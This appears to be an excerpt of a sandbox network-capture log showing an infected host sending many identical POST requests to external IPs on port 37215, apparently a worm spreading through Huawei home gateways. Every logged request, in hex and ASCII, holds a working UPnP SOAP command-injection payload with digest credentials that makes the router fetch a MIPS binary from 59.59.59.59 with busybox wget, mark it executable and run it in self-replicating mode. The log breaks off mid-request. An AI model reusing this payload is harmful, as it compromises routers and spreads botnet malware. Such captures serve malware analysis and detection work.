2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2331192.168.2.155882441.87.194.23537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.363830090 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2332192.168.2.1554742180.129.42.16437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.368974924 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2333192.168.2.1558984157.139.159.1737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.376605034 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2334192.168.2.154664041.252.83.8037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.376624107 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2335192.168.2.1532988197.252.49.4637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.376686096 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2336192.168.2.154646484.199.163.9637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.376763105 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2337192.168.2.1536388197.82.233.5437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.376831055 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2338192.168.2.1535990206.140.161.12437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.376868963 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2339192.168.2.1540362197.209.101.8037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.376903057 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2340192.168.2.155076241.11.229.18837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.376960993 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2341192.168.2.1557154157.1.125.9737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.376997948 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
